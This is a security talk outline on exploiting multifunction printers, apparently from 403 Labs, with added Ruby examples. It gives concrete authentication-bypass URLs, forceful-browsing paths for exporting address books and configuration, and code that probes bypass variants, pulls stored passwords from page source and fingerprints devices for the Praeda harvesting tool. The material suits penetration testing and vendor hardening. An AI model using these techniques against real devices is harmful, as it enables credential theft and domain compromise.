Exploiting Vulnerabilities in Multifunction Printers

403 Labs consultant Pete Arzamendi discusses the possibilities of exploiting vulnerabilities in multifunction printers.

  • Exploiting vulnerabilities in Multifunction Printers
    Pete Arzamendi
    Consultant, 403 Labs, LLC
  • Introduction
    Pete Arzamendi
    • Consultant at 403 Labs
    • Both a Qualified Security Assessor (QSA) and a Payment Application Qualified Security Assessor (PA-QSA) for the Payment Card Industry (PCI)
    • Former packet monkey, with over 10 years of experience in the Information Technology field
    • Worked with small and medium businesses and with local and state authorities on computer forensic cases and security assessments
    • Hobbies include malware analysis and vulnerability research
    • Member of the foofus.net team
  • Introduction
    403 Labs, LLC
    • Full-service information security and compliance consulting firm headquartered in Milwaukee with additional offices in Chicago and San Francisco
    • Experts in the Payment Card Industry (PCI)
    • Qualified Security Assessor (QSA)
    • Payment Application Qualified Security Assessor (PA-QSA)
    • Approved Scanning Vendor (ASV)
    • PCI Forensics Investigator (PFI) (just approved, expect to be listed shortly)
    • Penetration testing, including web applications
    • Experienced in handling computer forensic investigations
  • Agenda
    • History of printers
    • MFP functions and features
    • MFP flaws and vulnerabilities
    • Leveraging MFP during penetration testing
    • Development of an automated harvesting tool, 'PRAEDA'
    • Q/A
  • Terms and jargon
    • LDAP: The Lightweight Directory Access Protocol is an application protocol for reading and editing directories. A directory in this sense is an organized set of records: for example, a telephone directory is an alphabetical list of persons and organizations with an address and phone number in each "record".
    • SMB: Server Message Block (SMB) is mainly used to provide shared access to files, printers and serial ports, and for miscellaneous communications between nodes on a network.
    • SMTP: Simple Mail Transfer Protocol (SMTP) is an Internet standard for electronic mail (e-mail) transmission.
    • AD: Active Directory (AD) is a directory service created by Microsoft. Active Directory allows administrators to assign policies and to deploy and update software. Active Directory networks can vary from a small installation with a few computers, users and printers to tens of thousands of users, many different network domains and large server farms spanning many geographical locations.
  • History of Multifunction Printers
    • Gary Starkweather is credited with inventing the laser printer at Xerox in 1969
    • The first multifunction printer/copier, the "Xerox Printer 100," 1987
    • March 1991 – The HP LaserJet IIISi, the world's first networked printer
    • The first true multifunction printer/fax/copiers were introduced in the early 1990s
    In 2011 you really can't buy just a printer
  • MFP functions and features
    • Looking for features and functions that can be leveraged to gain information useful in attacking other systems
    • Email
      • Server settings
      • Address books
    • Faxing
      • Contact info
      • User name
      • Address books
  • MFP functions and features (screenshots)
  • Toshiba functions and features (screenshots; Network Path setting)
  • Canon functions and features (screenshots)
  • HP functions and features (screenshots: HP M4345, 9250, CM6040)
  • MFP flaws and vulnerabilities
    Security Bypass
    • Various brands and models suffer from a vulnerability allowing the authentication check to be bypassed
    Example: Toshiba e-STUDIO /TopAccess/Administrator/Setup/ScanToFile/List.htm
    Add an extra slash (/) to the URL and full access is allowed
    Example: Home/Office HP Officejet
    Add an extra page= parameter and full access is allowed
  • MFP flaws and vulnerabilities
    Forceful Browsing
    • Gain access to web pages and files just by knowing the correct URL path
    • Typically a number of devices, printers and network appliances correctly secure files with cgi, htm and html extensions, but allow unauthenticated access to other file types
  • MFP flaws and vulnerabilities
    Forceful Browsing
    Canon imageRUNNER
    Export address books
    • AID= can be incremented to download different address books
    • ACLS=1 on imageRUNNER 3000 series
    • ACLS=2 on imageRUNNER 4000 & 5000 series
    • Extract user names
    • Could also contain passwords
    • Accessible hosts
  • MFP flaws and vulnerabilities
    Forceful Browsing
    • Canon imageRUNNER
    • Additional export: http://target:8080/usermode.umd
    • usermode.umd is a data file containing printer configuration data in plain text
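The bypass and forceful-browsing slides above give one trick each (an extra slash for the Toshiba TopAccess page, an extra page= parameter for the HP Officejet) without saying where in the URL it goes. The Ruby below is an added example, not code from the talk or from Praeda: it builds the request variants for a protected management URL, trying the doubled slash at every path segment boundary and appending the page parameter (those positions are assumptions), then classifies each response as protected or bypassed. The fetcher is pluggable; the run at the bottom uses a constructed stub standing in for a device, not a capture from real hardware.

```ruby
require "uri"

# Build the bypass candidates the slides describe for one protected URL.
# Assumption: the "extra slash" can sit at any segment boundary, so every
# boundary is tried; the "extra page=" is appended to the query string.
def bypass_variants(url)
  u = URI.parse(url)
  base = "#{u.scheme}://#{u.host}"
  base += ":#{u.port}" if u.port != u.default_port
  segs = u.path.split("/", -1)            # "/a/b.htm" -> ["", "a", "b.htm"]
  query = u.query ? "?#{u.query}" : ""
  variants = (1...segs.length).map do |i|  # "//a/b.htm", "/a//b.htm", ...
    "#{base}#{(segs[0...i] + [''] + segs[i..]).join('/')}#{query}"
  end
  variants << "#{base}#{u.path}?#{[u.query, 'page='].compact.join('&')}"
  variants.uniq
end

# Decide whether a response shows the control held. Conventions assumed:
# 401/403 or a redirect to a login page is :protected; a 200 that carries
# all the caller-supplied markers of the protected page is :bypassed; a 200
# that only renders a login form is :protected; anything else is :unknown.
def classify(status:, headers: {}, body: "", markers: [])
  return :protected if [401, 403].include?(status)
  return :protected if (300..399).cover?(status) && headers.fetch("Location", "") =~ /login/i
  return :bypassed  if status == 200 && !markers.empty? && markers.all? { |m| body.include?(m) }
  return :protected if status == 200 && body =~ /<form[^>]*login|name\s*=\s*["']?(password|passwd|pwd)/i
  :unknown
end

# Request the original URL and every variant through +fetch+, a callable
# returning [status, headers, body], and map each URL to its verdict.
def probe(url, fetch:, markers:)
  ([url] + bypass_variants(url)).to_h do |req|
    status, headers, body = fetch.call(req)
    [req, classify(status: status, headers: headers, body: body, markers: markers)]
  end
end

# Constructed stub (not a real device): redirects the canonical URL to a login
# page but serves the settings page when the path carries a doubled slash.
def stub_fetch
  lambda do |req|
    path = req.sub(%r{\Ahttps?://[^/]*}, "")
    if path.include?("//")
      [200, {}, '<title>Scan to File</title><input type="password" name="password" value="Summer2010!">']
    else
      [302, { "Location" => "/TopAccess/Login.htm" }, ""]
    end
  end
end

TARGET = "http://printer/TopAccess/Administrator/Setup/ScanToFile/List.htm"

def demo_probe
  probe(TARGET, fetch: stub_fetch, markers: ["Scan to File"])
end

if $PROGRAM_NAME == __FILE__
  demo_probe.each { |url, verdict| puts "#{verdict.to_s.ljust(9)} #{url}" }
end
```

Against a live device, replace `stub_fetch` with a lambda wrapping Net::HTTP, and pick markers that only the authenticated page contains (a heading or a field name), so that a login form rendered with status 200 is not mistaken for a bypass.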
  • MFP flaws and vulnerabilities
    • Information leak - A look at a few examples
    • Toshiba e-STUDIO
    • Canon imageRUNNER
    • HP MFP
  • MFP flaws and vulnerabilities
    Toshiba Information Leak
    Just because the web form shows ●●●●●●●● doesn't mean the value is truly hidden
    It is not uncommon to find the data viewable in the page source as plain text
  • MFP flaws and vulnerabilities
    Canon Information Leak
    Want to bet this is also viewable in the source?
    Although not directly found in the Password: value field, it was still found within a hidden input tag
  • MFP flaws and vulnerabilities
    HP Information Leak
    Once again, just examine the properties of the password field
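The three information leaks above share one root cause: the browser masks the field, but the HTML the device sends still carries the stored credential, either as the value of the password input (Toshiba, HP) or in a hidden input next to it (Canon). The Ruby below is an added example, not code from the talk or from Praeda; it scans a saved settings page for both patterns and needs no network access. The two pages it runs on are constructed stand-ins for the Toshiba- and Canon-style forms, and the field names in them are assumptions.

```ruby
# Match each <input ...> tag, then its attributes (double-, single- or unquoted).
INPUT_TAG = /<input\b[^>]*>/im
ATTR      = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/

# Parse the attributes of a single <input ...> tag into a lowercase-keyed hash.
def input_attrs(tag)
  tag.scan(ATTR).each_with_object({}) do |(name, dq, sq, bare), h|
    h[name.downcase] = dq || sq || bare || ""
  end
end

# Return [{name:, value:, how:}] for every field whose value leaks a secret:
#  - type="password" inputs that arrive pre-filled from the device config
#  - hidden inputs whose name suggests a credential
# Fields with an empty value (the Canon password box) are not reported.
def leaked_credentials(html)
  html.scan(INPUT_TAG).map do |tag|
    a = input_attrs(tag)
    type  = a.fetch("type", "text").downcase
    value = a["value"].to_s
    next if value.empty?
    if type == "password"
      { name: a["name"], value: value, how: "prefilled password field" }
    elsif type == "hidden" && a["name"].to_s =~ /pass|pwd|secret|key/i
      { name: a["name"], value: value, how: "hidden input" }
    end
  end.compact
end

# Constructed sample pages (not captures from real devices).
TOSHIBA_STYLE = <<~'HTML'
  <form action="/TopAccess/Administrator/Setup/ScanToFile/List.htm" method="post">
    Network Path: <input type="text" name="netpath" value="\\fileserver\scans">
    User: <input type="text" name="username" value="CORP\svc_scan">
    Password: <input type="password" name="password" value="Summer2010!">
  </form>
HTML

CANON_STYLE = <<~'HTML'
  <form action="/ldap_settings" method="post">
    Server: <input type="text" name="ldap_host" value="dc01.corp.example">
    Password: <input type="password" name="ldap_pw" value="">
    <input type="hidden" name="ldap_pass_hidden" value="ldapBind#42">
  </form>
HTML

def demo_leaks
  { toshiba: leaked_credentials(TOSHIBA_STYLE), canon: leaked_credentials(CANON_STYLE) }
end

if $PROGRAM_NAME == __FILE__
  demo_leaks.each do |vendor, hits|
    hits.each { |h| puts "#{vendor}: #{h[:name]} = #{h[:value]} (#{h[:how]})" }
  end
end
```

The check is deliberately lexical: it reads the source the server actually sent rather than what the browser renders, which is exactly the gap the slides point at. A vendor fix is to never echo the stored secret into the form at all (send an empty field and only update the setting when the field is non-empty on submit).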
  • What the bad guys are doing…
    Leveraging MFP vulnerabilities
  • Leveraging MFP during penetration testing
    • HP to domain admin access
      • HP Color LaserJet CP4025
      • Extract users' names from the color job log
      • User with a weak password
      • Access to workstations
      • Domain admin token
  • Leveraging MFP during penetration testing
    • Toshiba to payroll
      • Toshiba e-STUDIO
      • Extract password from the scan-to-file function
      • Gain access to the AD domain
      • Gain access to a number of folders/files/shares
      • Access to one special file share, "Payroll backup"
  • Leveraging MFP during penetration testing
    • Canon to domain controller
      • Canon imageRUNNER
      • Extract LDAP settings
      • Enumerate domain user info
      • Remote Desktop access to all servers
  • Leveraging MFP during penetration testing
    • Fax to pwned
      • OfficeBridge – Fax system
      • First device we found credentials stored on – this is what got this project started
      • Extract password from LDAP settings
      • Account was a domain admin account
  • 01/27/11
  • Automating the process
  • Automated harvesting: Praeda
    What is Praeda?
    • Latin for robber, plunderer
    • A tool for the purpose of gathering information from network appliances through their web management interfaces
      • Printers
      • Network appliances
    • Beta version written in Perl
    • Goal was to create a simplistic tool that was modular
  • Automated harvesting: Praeda
    DataFile Structure
    P000005|HP Color LaserJet CP3525 Printers|HP-ChaiSOE/1.0|MP0002
    P000006|HP Color LaserJet CP3505 Printers|HP-ChaiSOE/1.0|MP0002|
    P000007||Canon Http Server 2.10|MP0003|MP0004|MP0005
    P000008||Canon Http Server 2.11|MP0003|MP0004|MP0005
    P000009|Home - Phaser 7750GX|Allegro-Software-RomPager/4.10|MP0006
    P000013|Home - Phaser 6360DT|Allegro-Software-RomPager/4.34|MP0006
    P000014|TopAccess|TOSHIBA TEC CORPORATION|MP0007
  • Automated harvesting: Praeda
    • We presently enumerate data from a dozen or more different printer types/versions
    • Plan is to grow this to cover as many printers as we can find
    • Looking for other simple methods for identifying printer types; the present process involves querying the web interface for:
      • Page title
      • Server type (HTTP Server header)
    • Researching encryption methods used by some vendors for backup and clone process outputs
      • HP
      • Xerox
    • Looking into migrating code to Ruby – early stages of conversion started
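The data file shown two slides back and the fingerprinting bullets above describe the same mechanism: a pipe-delimited record per device (ID, page title, Server header, then one or more module IDs), matched against the title and Server header the device returns. The Ruby below is an added example, not Praeda's own code; it parses the sample lines from the slide, fingerprints a device from those two values and returns the modules to run. The record layout is inferred from the sample lines, and the two helpers that pull the title out of an HTML page and the header out of a response hash are assumptions, since the talk does not show that code. The data file's own quirks are handled: the P000006 line has a trailing pipe, which must not become an empty module name, and the Canon rows have no title and match on the Server header alone.

```ruby
Record = Struct.new(:id, :title, :server, :modules)

# The sample data file exactly as shown on the slide.
DATAFILE = <<~DATA
  P000005|HP Color LaserJet CP3525 Printers|HP-ChaiSOE/1.0|MP0002
  P000006|HP Color LaserJet CP3505 Printers|HP-ChaiSOE/1.0|MP0002|
  P000007||Canon Http Server 2.10|MP0003|MP0004|MP0005
  P000008||Canon Http Server 2.11|MP0003|MP0004|MP0005
  P000009|Home - Phaser 7750GX|Allegro-Software-RomPager/4.10|MP0006
  P000013|Home - Phaser 6360DT|Allegro-Software-RomPager/4.34|MP0006
  P000014|TopAccess|TOSHIBA TEC CORPORATION|MP0007
DATA

# Parse "ID|title|server|module|module..." lines; blank lines and empty
# trailing fields (the stray pipe on P000006) are ignored.
def parse_datafile(text)
  text.each_line.map(&:strip).reject(&:empty?).map do |line|
    id, title, server, *mods = line.split("|")
    Record.new(id, title.to_s, server.to_s, mods.reject(&:empty?))
  end
end

# Pull the two fingerprint values out of a response (assumed helpers).
def page_title(html)
  m = html.match(%r{<title>\s*(.*?)\s*</title>}im)
  m ? m[1] : ""
end

def server_header(headers)
  headers.find { |k, _| k.casecmp?("Server") }&.last.to_s
end

# An empty title or server in the data file is a wildcard; otherwise the
# comparison is exact (case-insensitive), because the file lists Canon 2.10
# and 2.11 as separate records.
def fingerprint(records, title:, server:)
  records.select do |r|
    (r.title.empty?  || r.title.casecmp?(title.to_s.strip)) &&
      (r.server.empty? || r.server.casecmp?(server.to_s.strip))
  end
end

def modules_for(records, title:, server:)
  fingerprint(records, title: title, server: server).flat_map(&:modules).uniq
end

# Constructed response from a Canon-style device (not a real capture).
SAMPLE_HEADERS = { "Content-Type" => "text/html", "Server" => "Canon Http Server 2.11" }
SAMPLE_BODY    = "<html><head><title>Remote UI</title></head><body></body></html>"

def demo_modules
  recs = parse_datafile(DATAFILE)
  modules_for(recs, title: page_title(SAMPLE_BODY), server: server_header(SAMPLE_HEADERS))
end

if $PROGRAM_NAME == __FILE__
  puts "modules to run: #{demo_modules.join(', ')}"
end
```

Because both fingerprint values are attacker-controllable strings from the device, an unknown banner simply yields no modules rather than a default; extending coverage means adding a record, not loosening the match.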
  • Questions about Praeda
    Pete Arzamendi
    Beta version of Praeda available at
  • Contact Information
    Pete Arzamendi
    403 Labs, LLC